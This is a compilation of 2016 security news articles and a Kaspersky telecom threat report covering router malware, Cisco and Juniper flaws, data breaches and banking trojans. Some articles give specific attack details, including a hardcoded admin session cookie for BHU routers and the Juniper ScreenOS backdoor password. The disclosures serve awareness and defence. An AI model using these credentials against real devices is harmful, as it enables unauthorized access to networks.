The Linux Trojan is Linux.PNScan, it was first spotted last year when it was used to infect devices based on ARM, MIPS, or PowerPC architectures.

Now the threat was discovered in the wild actively targeting routers based on x86 Linux in an attempt to install backdoors on them.

“As per shown in title, it’s a known ELF malware threat, could be a latest variant of “Linux/PnScan”, found in platform x86-32 that it seems run around the web within infected nodes before it came to my our hand. This worm is more aiming embed platform and I am a bit surprised to find i86 binary is hitting some Linux boxes.” states the analysis published by Malware Must Die!

“This threat came to MalwareMustDie ELF team task before and I posted analysis in Mon Sep 28, 2015 on kernelmode [link] along with its details and threat, I thought the threat is becoming inactive now and it looks like I’m wrong, as the malware works still in infection now as worm functions and is hardcoded to aim / 16 segment (located in network area of Telangana and Kashmir region of India), where it was just spotted. Since I never write about this threat in this blog (except kernelmode), it will be good to raise awareness to an active working and alive worm.”

The new strain of Linux.PNScan.2, unlike the original variant Linux.PNScan.1, which attempted to brute force router login using a special dictionary, the new threat targets specific IP addresses and attempts to establish an SSH connection by using the following credentials:combinations:

Linux.PNScan linux trojan

The new Linux.PNScan.2 was compiled on compatibility of GCC(GNU) 4.1.x via the compiler tool Toolchains with cross compiler option for i686 using the SSL enabled configuration.

When the threat infects a device, it will fork its process 4 times, creating certain files on the infected system, daemonizing and listening to 2 TCP ports, targeting hardcoded IPs, and sending HTTP/1.1 requests via SSL to twitter.com on port 443 to hide its malicious traffic.

As its predecessor, also this variant can brute forcing logins.

The malware researchers who analyzed the threat suggest it might be of Russian origin.

“I guess this happened from 6 months ago until now, and the hacker is sitting there in Russia network for accessing any accessible infected nodes.” continues the analysis.

The experts from Malware Must Die! also published a list of infection symptoms, routers have specific processes running in the initial stage of the infection, the launched attack can be seen in the network connectivity, each connected target is logged in the “list2” file and the brute list is traced in file “login2.”

Cisco Updates ASA Software to fix the Equation Group’s EXTRABACON exploit

26.8.2016 securityaffairs Vulnerebility

Cisco has started releasing patches for its ASA software to address the Equation Group’s EXTRABACON exploit included in the NSA data dump leaked online.
Security firms and IT giants are analyzing the huge archive leaked by the Shadow Brokers crew after the hack of the NSA-linked Equation Group.

We reported that some of the exploits included in the archive are effective against CISCO, Fortinet, and Juniper network appliance.

For example, the BENIGNCERTAIN tool included in the NSA data dump could be exploited by remote attackers to extract VPN passwords from certain Cisco devices, meanwhile the EXTRABACON was analyzed by the Hungary-based security consultancy SilentSignal to hack into the newer models of Cisco’s Adaptive Security Appliance (ASA).

The EXTRABACON tool exploits the CVE-2016-6366 vulnerability to allow an attacker who has already gained a foothold in a targeted network to take full control of a CISCO ASA firewall.

The CVE-2016-6366 flaw affects Cisco’s ASA appliances, both firewalls and routers, Firepower products, Firewall Services Modules, industrial security appliances, and PIX firewalls.

CISCO ASA Software 2

The EXTRABACON tool leverages on a flaw that resides in the Simple Network Management Protocol (SNMP) implemented by the ASA software.

“A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.” states the advisory published by CISCO.

“The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP. An attacker could exploit this vulnerability by sending crafted SNMP packets to the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.”

Cisco promptly analyzed the exploits and released the necessary patches. Network administrators that manage CISCO ASA 7.2, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6 and 8.7 have to update their installations to version 9.1.7(9) or later. The vulnerability has been fixed in the ASA 9.1, 9.5 and 9.6 with the release of versions 9.1.7(9), 9.5(3) and 9.6.1(11).

The remaining versions will be fixed by the IT giant in the upcoming days, anyway, the company provided a detailed description of the workarounds to implement as a temporary solution.

The company will not issue any patch for no longer supported devices, including firewall modules and PIX firewalls.

Unknown Bidder Buys 2,700 Bitcoins (worth $1.6 million) at US Government Auction
23.8.2016 thehackernews Security
A winning anonymous bidder bought 2,700 Bitcoins (worth roughly $1.6 Million) in an auction held by the United States Marshals Service (USMS) on Monday.
The US government announced at the beginning of this month its plans to auction 2,719 Bitcoins that were seized during several criminal, civil and administrative cases like Silk Road.
The US Marshals confirmed to CoinDesk that four bids were received in the auction that took place between 13:00 and 19:00 UTC on August 22.
The majority of the Bitcoins in the auction were stemmed from investigations of the Silk Road online black marketplace.
Included 2,719 Bitcoins in the auction were:
Around 1,300 Bitcoins seized from a civil case related to Matthew Gillum, a Silk Road drug dealer, who was sentenced to nine years in prison in 2015.
Only 2.8 Bitcoins directly came from Silk Road founder Ross Ulbricht, who was found guilty of operating Silk Road for illegal goods and handed two life sentences.
Some 65 Bitcoins came from Carl Force, a former Drug Enforcement Administration agent, who was sentenced for stealing Bitcoins during the Silk Road investigation.
Around 665 Bitcoins came from the case of Sean Roberson, a Florida man who allegedly created an online shop for selling stolen credit and debit cards.
The last date for registration was 18 August and only five bidders registered to claim the 2,700 BTC block, according to the agency.
However, this is not the first Bitcoin auction conducted by the US Marshals Service. The federal law enforcement agency has been selling off Bitcoins in a series of auctions.
The last USMS auction took place on November 15, when 11 bidders, including bitcoin exchange itBit, over-the-counter trading firm Cumberland Mining, and investor Tim Draper, bought 44,000 Bitcoins, worth $14.6 Million.

Epic Games Forum Hacked, Once Again — Over 800,000 Gamers' Data Stolen
23.8.2016 thehackernews Hacking
If you are a fan of Unreal Tournament from Epic Games or ever have participated in discussions on the online forums run by Epic Games, you possibly need to change your forum password as soon as possible.
It seems the Unreal Engine and its creators, Epic Games' forums have recently been compromised by an unknown hacker or a group of hackers, who have stolen more than 800,000 forum accounts with over half a Million from the Unreal Engine's forums alone.
The hackers get their hands on the forum accounts by exploiting a known vulnerability resided in an outdated version of the vBulletin forum software, which allowed them to get access to the full database.
Epic believes registration information that includes usernames, scrambled passwords, email addresses, dates of birth, IP addresses, and date of joining, may have been obtained in the attack.
"We believe a recent Unreal Engine and Unreal Tournament forum compromise revealed email addresses and other data entered into the forums, but no passwords in any form, neither salted, hashed, nor plaintext," announcement on the Unreal Engine forum website reads.
However, ZDNet reports "their full history of posts and comments including private messages, and other user activity data from both sets of forums" have also been compromised.
Most of the stolen passwords are scrambled that can not be cracked easily, but hackers could exploit other stolen data to send phishing messages to forum members' email addresses in an effort to infect their systems with ransomware or other malicious software.
Epic Game Players at Risk
Moreover, there is bad news for players of Infinity Blade, UDK, Gears of War, and older Unreal Tournament games, as hackers may have compromised their salted hashed passwords, along with their email addresses and other data entered into the forums.
At the time of writing, the Epic Games' forum and Unreal Engine forums both appeared to be down.
So, users are advised to change their passwords for the forum accounts as soon as possible and keep a longer and stronger one this time and change passwords for other online services, especially if you use the same password for multiple sites.
You can use a good password manager that allows you to create complex passwords for different sites and remember them for you.
We have listed some best password managers that could help you understand the importance of password manager and help you choose a suitable one, according to your requirement.
LeakedSource, a search engine site that indexes leaked login credentials from data breaches, has added the breached data from the Epic Games' forums into its database, which includes the password hashes to allow its users to search for their stolen data.

IoT – Shocking : How your home sockets could aid in Cyber attacks
23.8.2016 securityaffairs Security

IoT devices are dramatically enlarging our surface of attack, hackers can exploit smart sockets to shut down Critical Systems.
I love some of the gangster nicknames people come up with. Knuckles, Fat Tony , Stab Happy or even Bambi. Names are characteristic of their personality and attitude. It’s time to add Toaster Socket to the name as in the age of Smart Grid, criminals are getting updated.

The Internet of Things (IoT) ,which soon may become the “Internet of Everything,” is something that has made every security professional reanalyse all his security strategies. Security has been a challenge when it came to handling our basic Information and Communication Technology (ICT) systems. With the disruptive and highly welcomed IoT age upon us we may soon have larger challenges.

A recent research by Bitdefender found that smart electrical sockets can be exploited easily and be made a zombie on a bot network.

“The vulnerable device is a smart electrical switch that plugs into any wall socket and enables users to schedule a connected electronic device on and off from their smartphone. It can power any gadget – thermostats, smart TVs, coffee makers, security cameras, garage doors, and medical devices and so on.” states BitDefender.

IoT hacking critical systems

For those who know the challenges an enterprise can face while fending off attacks from such botnets, would realize we are adding ammunition to the cyber criminal’s arsenal.

Other than exploiting the inbuilt Operating System to execute commands it can affect the user by gaining access to his email, gain login credentials to his other wireless systems, cause overheating and hence create fire “accidents” . The possibilities are endless.

Electrical and electronic appliances have had their recent fair share of negative media when it comes to being actors in cyber attacks. Surveillance cameras could be recruited in powerful botnets, smart LED light bulbs giving away WiFi passwords or refrigerators launching DDoS attacks.

A common issue found in the power outlet by security researchers is the lack of robust password and username combination security strength, the lack of encrypted configuration mechanism when joining your personal network (Eg.: Home WiFi network)and weak encoded information sharing between vendor servers and appliance.

Based on the above discoveries Bitdefender outlined some ways of launching attacks and compromising your system where the attack vector is your smart socket.

First, gain access to your email and hence disable your two factor authentication process (Great security measure by the way) .
Second, use a ill-filtered password checking system to in a way inject codes to pretty much reset your entire system.
Well coming to the meat of the matter, an attacker always wants to gain root access to a system . These few stated methods and a little effort could give them that. Hence your socket may end up being weaponized for cyber attacks, be used to monitor and harm you (the user) , gain access to other systems in your network and a major overlooked issue affect your privacy.

The solution is evident. You the user has to demand security as a basic need while buying such systems or you may have to have bail money for your toaster switch a.k.a. cyber criminal.

It is time to purchase a security solution specifically designed for IoT devices.

New Gozi Campaigns Target Global Brands with sophisticated features
23.8.2016 securityaffairs Virus

Researchers from Buguroo discovered new Gozi campaigns using new techniques that targeted many banks and financial services worldwide.
The Gozi malware was first spotted in 2007, its source code has been leaked twice in the criminal underground allowing the creation of new sophisticated version. Recently security experts from the IBM X-Force Research spotted a new threat dubbed GozNym Trojan that combines the Gozi ISFB and Nymaim malware abilities.

Researchers from Buguroo discovered new Gozi campaigns that targeted mainly banks and financial services in Spain, Poland, and Japan, the experts also noticed some targeted attacks on users in Canada, Italy, and Australia.

Threat actors behind the new Gozi campaigns are using new techniques spreading the malware in the United States and Western Europe.

In Spain, attackers delivered the malware by exploiting compromised WordPress websites. The malware was spread via malicious links leveraging URL shortening services.

The new campaigns are using dynamic web injection and automatically optimize the selection of mules after profiling the victim.

Web injections are very sophisticated and optimized to avoid detection, according to the report the operators refined the mechanism after an attack has been discovered.

The greatest number of infections was observed in Poland and Japan, threat actors behind the campaign also used servers located in Canada, Italy, and Australia in other Gozi campaigns that hit these countries.

new Gozi campaigns

The new campaigns impacted popular brands, including BNP Paribas, Bank of Tokyo, CitiDirect BE, ING Bank, PayPal, Société Générale, BNP Paribas.

“A detailed analysis of how the webinjects work revealed that when an infected user at a target financial institution attempts a transaction, the C2 (Command and Control server) is notified in real time and sends the user’s browser the information necessary for carrying out fraudulent transfers. What the user sees: The injected code presents a fraudulent

What the user sees: The injected code presents a fraudulent deposit pending alert requesting the security key to complete the transfer.
What the bank sees: Hidden underneath, however, is the actual real transfer page being presented to the bank. The unsuspecting user is inadvertently entering their key, not to receive money, but to send their money to a “mule” designated by the malware operators”
The victim is inadvertently entering the requested information and sends money to one of the selected “mule.”

The new Gozi campaigns also revealed that, for certain versions of the webinjects, the Trojan would send a kind of biometric information to the control panel. The information includes details on how long the user takes to move from an input field to the next one, this kind of information is precious to bypass protection systems that leverage user behavior.

The experts noticed some similarities between the webinjects used in these new Gozi campaigns and the one implemented by a malware family dubbed Gootkit.

“The webinjects used in these campaigns also revealed key similarities to GOOTKIT, not just related to the code and the techniques used, but also to the dates and times corresponding to its updates in the corresponding ATS panels—prompted by affected companies launching security measures to prevent the malware’s operation.” states the report.”This development points to the professionalization of malware services trend. The services are sold underground by independent businesses and are able to deliver malicious code for use by different organizations, families of malware and campaigns.”

Members call for a Tor General Strike and shut down Tor for a day
23.8.2016 securityaffairs Safety
A few members of the community are calling for a ‘Tor general strike’ to protest against some decisions taken recently by the core members.
Last month, the Tor Project announced that an internal investigation had confirmed the allegations of sexual misconduct against the notorious member Jacob Appelbaum.

The allegations divided the internet privacy community, as a result of events the entire board of directors of the project was replaced.

News of the day is that a few members of the community are calling for a ‘Tor general strike.’ They want to express their dissent on the way the investigation was handled.

A message published on Twitter invites those who run parts of the Tor network infrastructure to shut down their machines, developers to stop working on Tor, and of course, users to stop using the anonymizing network.

Cryptome @Cryptomeorg
#torstrike calls for global sit in on September 1https://ghostbin.com/paste/kmnzz
00:24 - 21 Ago 2016
26 26 Retweet 18 18 Mi piace
The members who are calling for a Tor General Strike are also opposed to the decision of the Tor Project to hire an ex-CIA official.

“Tor can no longer be trusted after #jakegate / #torgate and hire of CIA,” states the Ghostbin post that calls for the Tor Global Strike. “Its sinking credibility is putting people at risk. We hope it can be healed and regain trust with mass action. A short blackout may hurt in the short term, but save Tor in the long term. It will also allow dissenting voices to be heard.”

Joseph Cox from Motherboard reported a leaked chat log from an internal Tor Project IRC channel that demonstrated that part of the members of the Project did not agree on the move of hiring a supposed ex-CIA agent, “DaveC1”.

Some internal members of the Tor Project were not aware of the past of DaveC1.

Tor Global Strike

A Tor General Strike is probably the worst way to express the dissent, many individuals worldwide rely on the Tor network to avoid censorship and express their ideas without fearing for their life.

“Journalists and activists use Tor in countries where people can be killed for the things they say,” Shari Steele, the Tor Project’s executive director told Motherboard. “Shutting down the Tor network would shut down their speech or, even more dangerous, could force them to use unsafe methods of communication.”

The call to the Tor General Strike includes 16 requests to the Tor Project, one of them invoke the sacking the co-founder Roger Dingledine.

Many demands included in the call for the Tor General Strike are related to the internal investigation on Appelbaum’s conduct. They demand more details on the claims against Appelbaum to be made public.

The news of the strike comes after the Tor relay operator Stephan Seitz shut down its node.

“The situation how the affair about Jake was handled by the Tor project has made me feel very uneasy. After digging through several material (for example https://shiromarieke.github.io/tor) I find that I am no longer believing in this project or trust it. That’s why I’m shutting down my tor relay fsingtor now.“ Seitz wrote to a Tor Project.

BHU Wi-Fi router, it is really too easy to hack these network devices
22.8.2016 securityaffairs Hacking

A security expert analyzed a BHU Wi-Fi router and found that it is easy to hack by an unauthenticated attacker that can access sensitive information.
Tao Sauvage, an expert from IOActive, has analyzed a BHU Wi-Fi router that he purchased during a travel. The BHU Wi-Fi router appears like a surveillance box, but according to the analysis of the experts, it is affected by multiple vulnerabilities.

BHU Wi-Fi router

The network device is completely pwnable by an unauthenticated attacker that can access sensitive information.

The expert also explained that the BHU Wi-Fi router comes with hidden users, SSH enabled by default and a hardcoded root password … not so bad for an attacker, what do you think about?

Last scaring discovery about the Chinese-made router is that it injects a third-party JavaScript file into all users’ HTTP traffic.

“The BHU WiFi uRouter, manufactured and sold in China, looks great – and it contains multiple critical vulnerabilities. An unauthenticated attacker could bypass authentication, access sensitive information stored in its system logs, and in the worst case, execute OS commands on the router with root privileges.” wrote Sauvage.”

Sauvage has exploited the UART debug pins to extract the firmware and analyzed it, it has found multiple security vulnerabilities.

The expert noticed that the CGI script running everything reveals the session ID of the admin cookie, this means that it could easily hijacked by an attacker that obtains admin privileges.

The BHU Wi-Fi router includes a hard-coded SID, 700000000000000, an attacker can get access to “all authenticated features” by presenting it to the router.

Once presented the above SID to the device, it revealed the hidden user dms:3.

“So far, we have three possible ways to gain admin access to the router’s administrative web interface:

Provide any SID cookie value
Read the system logs and use the listed admin SID cookie values
Use the hardcoded hidden 700000000000000 SID cookie value
” explained Sauvage.

It is incredible, the BHU Wi-Fi router is full of security holes, the researchers also discovered that the device fails to perform XML address value sanitization, this allows an attacker to carry out an OS command injection. Sauvage claims that the router could be used to eavesdrop on router traffic using a command-line packet analyzer like

The router could be used by attackers to eavesdrop on the device traffic using a command-line packet analyzer like tcpdump or to hijack it for other malicious purposes.

“At this point, we can do anything:

Eavesdrop the traffic on the router using tcpdump
Modify the configuration to redirect traffic wherever we want
Insert a persistent backdoor
Brick the device by removing critical files on the router “.
I invite you to give a look to the analysis published by IOActive, it is amazing the number of issues affecting this specific device, and probably many others suffer the same problems.

Lets hope the Chinese manufactured that designed the device, the BHU Networks Technology Co., is now aware how insecure is its router.

Don’t forget that the many powerful botnets leverages on compromised SOHO devices.

Threat intelligence report for the telecommunications industry
22.8.2016 Kaspersky Security

The telecommunications industry keeps the world connected. Telecoms providers build, operate and manage the complex network infrastructures used for voice and data transmission – and they communicate and store vast amounts of sensitive data. This makes them a top target for cyber-attack.

According to PwC’s Global State of Information Security, 2016, IT security incidents in the telecoms sector increased 45% in 2015 compared to the year before. Telecoms providers need to arm themselves against this growing risk.

In this intelligence report, we cover the main IT security threats facing the telecommunications industry and illustrate these with recent examples.

Our insight draws on a range of sources. These include:

The latest telecoms security research by Kaspersky Lab experts.
Kaspersky Lab monitoring systems, such as the cloud antivirus platform, Kaspersky Security Network (KSN), our botnet tracking system and multiple other internal systems including those used to detect and track sophisticated targeted (advanced persistent threat, APT) attacks and the corresponding malware.
Underground forums and communities.
Centralized, specialized security monitoring systems (such as Shodan).
Threat bulletins and attack reports.
Newsfeed aggregation and analysis tools.
Threat intelligence is now a vital weapon in the fight against cyber-attack. We hope this report will help telecoms providers to better understand the cyber-risk landscape so that they can develop their security strategies accordingly.

We can provide more detailed sector and company-specific intelligence on these and other threats. For more information on our Threat Intelligence Reporting services please email intelligence@kaspersky.com.

Executive summary

Telecommunications providers are under fire from two sides: they face direct attacks from cybercriminals intent on breaching their organization and network operations, and indirect attacks from those in pursuit of their subscribers. The top threats currently targeting each of these frontlines feature many classic attack vectors, but with a new twist in terms of complexity or scale that place new demands on telecoms companies.

These threats include:

Distributed Denial of Service (DDoS) attacks. DDoS attacks continue to increase in power and scale and, according to the 2016 Data Breach Investigations Report, the telecommunications sector is hit harder than any other. Kaspersky Lab’s research reveals that in Q2, 2016, the longest DDoS attack lasted for 291 hours (or 12.1 days) – significantly longer than the previous quarter’s maximum (8.2 days), with vulnerable IoT devices increasingly used in botnets. Direct DDoS attacks can reduce network capacity, degrade performance, increase traffic exchange costs, disrupt service availability and even bring down Internet access if ISPs are hit. They can be a cover for a deeper, more damaging secondary attack, or a route into a key enterprise subscriber or large-scale ransomeware attack.
The exploitation of vulnerabilities in network and consumer devices. Our intelligence shows that vulnerabilities in network devices, consumer or business femtocells, USBs and routers, as well as root exploits for Android phones, all provide new channels for attacks – involving malware and technologies that individuals, organisations and even basic antivirus solutions cannot always easily remove.
Compromising subscribers with social engineering, phishing or malware. These classic techniques remain popular and can easily be mastered by entry-level cybercriminals, although 2016 sees changes in how more sophisticated attackers conduct their campaigns. Growing numbers of cyber-attackers now combine data sets from different sources, including open sources, to build up detailed pictures of potential targets for blackmail and social engineering purposes.
Insider threat is growing. Detailed profiles of targets are also used to recruit insiders to help perpetrate cybercrime. Some insiders help voluntarily, others are cooerced through blackmail. Insiders from cellular service providers are recruited mainly to provide access to data, while staff working for Internet service providers are chosen to support network mapping and man-in-the-middle attacks.
Other threats facing telecommunications companies include targeted attacks; poorly configured access controls, particularly where interfaces are publicly available to any Internet user; inadequate security for 2G/3G communications; and the risk of telecoms providers being drawn into unrelated attacks that exploit telecoms resources, and suffering collateral damage as a result.

Typical threats targeting telecoms


We can divide the main threats facing the telecommunications industry into two, interrelated, categories:

Threats targeting telecommunication companies directly. These include DDoS attacks, targeted attacks (APT campaigns), network device vulnerabilities and human-related threats like insider access, social engineering and the risk of allowing third parties to access information.
Threats targeting subscribers of telecoms services – particularly the customers of cellular service providers (CSPs) and Internet service providers (ISPs). These include malware for mobile devices, subscriber data harvesting, end-user device vulnerabilities, and more.
Threats directed at telecoms companies


DDoS (distributed denial of service) attacks remain a serious threat to telecoms providers around the world as attackers discover ever more ways of boosting the power and scale of attacks. Kaspersky Lab’s DDoS intelligence report for Q2, 2016 notes that websites in 70 countries were targeted with attacks. By far the most affected country was China, with South Korea and the US also among the leaders. 70.2% of all detected attacks were launched from Linux botnets, with cybercriminals paying close attention to financial institutions working with cryptocurrency. Another trend observed in Q2 was the use of vulnerable IoT devices in botnets to launch DDoS attacks.

The telecommunications sector is particularly vulernable to DDoS attacks. According to the 2016 Data Breach Investigations Report, the telecommunications sector was hit around twice as hard as the second placed sector (financial exchanges), with a median DDoS packet count of 4.61 million packets per second (compared to 2.4 Mpps for exchanges.)

The impact of a DDoS attack should not be underestimated. Direct attacks can reduce network capacity, degrade performance, increase traffic exchange costs, disrupt service availability and even bring down Internet access if ISPs are affected. With a growing number of connected devices and systems supporting mission-critical applications in areas such as healthcare and transport, unexpected downtime could be life threatening.

Further, DDoS attacks can be a cover for a deeper, more damaging secondary attack, or a route into a key enterprise subscriber or large-scale ransomeware attack.

A good example of the first is the 2015 cyber-attack on the UK telecoms company, TalkTalk. The hack, alledgedly perpetrated by a couple of teenagers, resulted in the loss of around 1.2 million customers’ email addresses, names and phone numbers, as well as many thousands of customer dates of birth and financial information – all ideal for use in financially-motivated social engineering campaigns. The forensic investigation revealed that the hackers had used a smokescreen DDoS attack to conceal their main activities.

DDoS attacks are also evolving. 2015 saw attackers amplify the power of DDoS attacks by turning them into DrDoS (Distributed reflection Denial of Service) attacks through the use of standard network protocols like NTP, RIPv1, NetBIOS (Network Basic Input/Output System) and BGP (Border Gateway Patrol). Another approach that is becoming more commonplace is the compromise of end-user routers via network-scanning malware and firmware vulnerabilities. Today’s faster mobile data transfer speeds and the growing adoption of 4G are also making smartphone-based botnets more useful for implementing DDoS attacks.

The worrying thing is that even inexperienced attackers can organize quite an effective DDoS campaign using such techniques.

Targeted attacks

The core infrastructure of a telecommunications company is a highly desirable target for cybercriminals, but gaining access is extremely difficult. Breaking into the core requires a deep knowledge of GSM architecture, rarely seen except among the most skilled and resourced cybercriminals. Such individuals can generally be found working for advanced, international APT groups and nation-state attackers, entities that have a powerful interest in obtaining access to the inner networks of telecommunication companies. This is because compromised network devices are harder to detect by security systems and they offer more ways to control internal operations than can be achieved through simple server/workstation infiltration.

Once inside the core infrastructure, attackers can easily intercept calls and data, and control, track and impersonate subscibers.

Other APTs with telecommunications on their radar

The Regin APT campaign, discovered in 2014, remains of the most sophisticated ever seen and has the ability to infiltrate GSM networks, while the Turla group, has developed the ability to hijack satellite-based Internet links as part of it’s Command & Control process, successfully obscuring its actual location.

Others, such as Dark Hotel and a new cyber-espionage threat actor likely to be of Chinese origin, exploit telecoms networks in their targeted campaigns. In these cases, the telecoms providers often suffer collateral damage even though they are not directly related to the attack. Further details on these can be found on Kaspersky Lab’s expert Securelist blog or through a subscription to the Kaspersky APT Threat Intelligence Reporting service.

Unaddressed software vulnerabilities

Despite all the high profile hacks and embarrassing data leaks of the last 12 months, attackers are still breaching telecoms defenses and making off with vast quantities of valuable, personal data. In many cases, attackers are exploiting new or under-protected vulnerabilities. For example, in 2015, two members of the hacker group, Linker Squad gained access to Orange Spain through a company website vulnerable to a simple SQL injection, and stole 10 million items of customer and employee data.

Threat Intelligence Report for the Telecommunications Industry

SQL injection vulnerability on Orange Spain web site

The impact of service misconfiguration

In many cases, the hardware used by by the telecommunications industry carries configuration interfaces that can be accessed openly via HTTP, SSH, FTP or telnet. This means that if the firewall is not configured correctly, the hardware in question becomes an easy target for unauthorized access.

The risk presented by publicly exposed GTP/GRX (GPRS Tunneling Protocol/GPRS Roaming Exchange) ports on devices provides a good example of this.

As CSPs encrypt the GPRS traffic between the devices and the Serving GPRS Support Node (SGSN), it is difficult to intercept and decrypt the transferred data. However, an attacker can bypass this restriction by searching on Shodan.io for devices with open GTP ports, connecting to them and then encapsulating GTP control packets into the created tunnel.

Table 1. Top 10 countries with GTP/GRX ports exposed to Internet access

# Country Number of GTP/GRX
1 China 52.698
2 Turkey 8.591
3 United States of America 6.403
4 Canada 5.807
5 Belgium 5.129
6 Colombia 2.939
7 Poland 2.842
8 Morocco 1.585
9 Jamaica 862
10 United Arab Emirates 808
The Border Gateway Protocol (BGP) is the routing protocol used to make decisions on routing between autonomous systems. Acceptance and propagation of routing information coming from other peers can allow an attacker to implement man-in-the-middle (MITM) attacks or cause denial of service. Any route that is advertised by a neighboring BGP speaker is merged in the routing database and propagated to all the other BGP peers.

Table 2. Top five countries with BGP protocol exposed to Internet access

# Country Number of devices
(end of 2015)
1 Republic of Korea 16.209
2 India 8.693
3 United States of America 8.111
4 Italy 2.909
5 Russian Federation 2.050
An example of such an attack took place in March 2015, when Internet traffic for 167 important British Telecom customers, including a UK defense contractor that helps to deliver the country’s nuclear warhead program, was illegally diverted to servers in Ukraine before being passed along to its final destinations.

To avoid probable attacks against BGP from unauthorized remote malefactors, we recommend that companies provide network filtering, allowing only a limited number of authorized peers to connect to BGP services. To protect against malicious re-routing and hijacking initiated through authorized autonomous systems we recommend that they monitor anomalies in BGP communications (this can be done through specialized software solutions or by subscribing to alerts from vendors providing this kind of monitoring.)

Vulnerabilities in network devices

Routers and other network devices are also primary targets for attacks against telecommunications companies.

In September 2015, FireEye researchers revealed the router malware “SYNful knock”, a combination of leaked privilege (root) credentials and a way of replacing device firmware that targets Cisco 1841, 2811 and 3825 routers (see Cisco advisory here).

Put simply, SYNful knock is a modified device firmware image with backdoor access that can replace the original operating system if the attacker has managed to obtain privileged access to the device or can physically connect to it.

SYNful is not a pure software vulnerability, but a combination of leaked privileged credentials combined with a certain way of replacing device firmware. Still, it is a dangerous way of compromising an organization’s IT infrastructure.

Threat Intelligence Report for the Telecommunications Industry

SYNful knock backdoor sign-in credentials request


Worldwide distribution of devices with the SYNful knock backdoor

The latest information on the number of potentially compromised devices is available through the link https://synfulscan.shadowserver.org/stats/.

A second Cisco vulnerability, CVE-2015-6389 enables attackers to access some sensitive data, such as the password file, system logs, and Cisco PCA database information, and to modify data, run internal executables and potentially make the system unstable or inaccessible. Cisco Prime Collaboration Assurance Software releases prior to 11.0 are vulnerable. Follow this Cisco bulletin for remediation actions.

For further information on Cisco fixes for its devices see https://threatpost.com/cisco-warning-of-vulnerabilities-in-routers-data-center-platforms/115609.

Juniper, another network device manufacturer has been found to carry vulnerabilities in its operating system for its NetScreen VPN appliances, enabling third-party access to network traffic. The issue was reported by the vendor in the security advisory JSA10713 on December 18th, 2015, along with the release of the patch.

It appears that the additional code with hardcoded password was planted in the source code in late 2013. The backdoor allows any user to log in with administrator privileges using hard-coded password “<<< %s(un=’%s’) = %u”.This vulnerability has been identified as CVE-2015-7755 and is considered highly critical.

Top countries where ScreenOS devices are used are the Netherlands, the United States, China, Italy and Mexico.


Juniper ScreenOS-powered devices worldwide

Another Juniper backdoor, CVE-2015-7756, affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20 and allows a third party to monitor traffic inside VPN connections due to security flaws in the Dual_EC PRNG algorithm for random number generation.

To protect the organization from misconfiguration and network device vulnerabilitiy, Kaspresky Lab recommendats that companies pay close attention to vulnerabilities in the network services of telecommunication equipment, establish effective vulnerability and configuration management processes, and regularly perform security assessments, including penetration testing for different types of attackers (a remote intruder, a subscriber, a contractor, etc.).

Malicious insiders

Even if you consider your critical systems and devices protected and safe, it is difficult to fully control some attack vectors. People rank at the very top of this list. Their motivations are often hard to predict and anticipate, ranging from a desire for financial gain to disaffection, coercion and simple carelessness.

While insider-assisted attacks are uncommon, the impact of such attacks can be devastating as they provide a direct route to the most valuable information.

Examples of insider attacks in recent years include:

A rogue telecoms employee leaking 70 million prison inmate calls, many breaching client-attorney privilege.
An SMS center support engineer who had intercepted messages containing OTP (One-Time Passwords) for the two-step authentication required to login to customer accounts at a popular fintech company. The engineer was found to be freely offering his services on a popular DarkNet forum.
For attackers, infiltrating the networks of ISPs and CSPs requires a certain level of experience – and it is often cheaper and easier to stroll across the perimeter with the help of a hired or blackmailed insider. Cybercriminals generally recruit insiders through two approaches: enticing or coercing individual employees with relevant skills, or trawling around underground message boards looking for an appropriate employee or former employee.

Employees of cellular service providers are in demand for fast track access to subscriber and company data or SIM card duplication/illegal reissuing, while staff working for Internet service providers are needed for network mapping and man-in-the-middle attacks.

A particularly promising and successful attack vector for recruiting an insider for malicious intrusion is blackmail.

Data breaches, such as the 2015 Ashley Madison leak reveal information that attackers can compare with other publically available information to track down where people work and compromise them accordingly. Very often, these leaked databases contain corporate email addresses, including those of telecommunication companies.

Further information on the emerging attack vectors based on the harvesting of Open Source Intelligence (OSINT) can be obtained using Kaspersky Lab’s customer-specific Intelligence Reporting services.

Threats targeting CSP/ISP subscribers


Attacks targeting the customers of cloud and Internet service providers remain a key area of interest for cybercriminals. We’ve revealed a number of malware activities and attack techniques based on internal information and incidents that were caught in our scope. As a result of analyzing this data the following main threats were identified:

Obtaining subscribers’ credentials. This is growing in appeal as consumers and businesses undertake ever more activity online and particularly on mobile. Further, security levels are often intentionally lowered on mobile devices in favor of usability, making mobile attacks even more attractive to criminals.
Compromising subscribers’ devices. The number of mobile malware infections is on the rise, as is the sophistication and functionality of the malware. Experienced and skilled programmers are now focusing much of their attention on mobile – looking to exploit payment services as well as low-valued assets like compromised Instagram or Uber accounts, collecting every piece of data from the infected devices.
Compromising small-scale telecoms cells used by consumers and businesses. Vulnerabilities in CSP-provided femtocells allow criminals to compromise the cells and even gain access to the entire cloud provider’s network.
Successful Proof-Of-Concept attacks on USIM cards. Recent research shows that the cryptography of 3G/4G USIM cards is no longer unbreakable. Successful attacks allow SIM card cloning, call spoofing and the interception of SMS.
Social engineering, phishing and other ways in

Social engineering and phishing remain popular activities and they continues to evolve and improve, targeting unaware or poorly aware subscribers and telecoms employees.

The attackers exploit trust and naiivity. In 2015, the TeamHans hacker group penetrated one of Canada’s biggest communications groups, Rogers, simply by repeatedly contacting IT support and impersonating mid-ranking employees, in order to build up enough personal information to gain access to the employee’s desktop. The attack provided hackers with access to contracts with corporate customers, sensitive corporate e-mails, corporate employee IDs, documents, and more.

Both social engineering and phishing approaches are worryingly successful. The Data Breach Investigations Report 2016 found that 30% of phishing emails were opened, and that 12% clicked on the malicious attachment – with the entire process taking, on average, just 1 minute and 40 seconds.

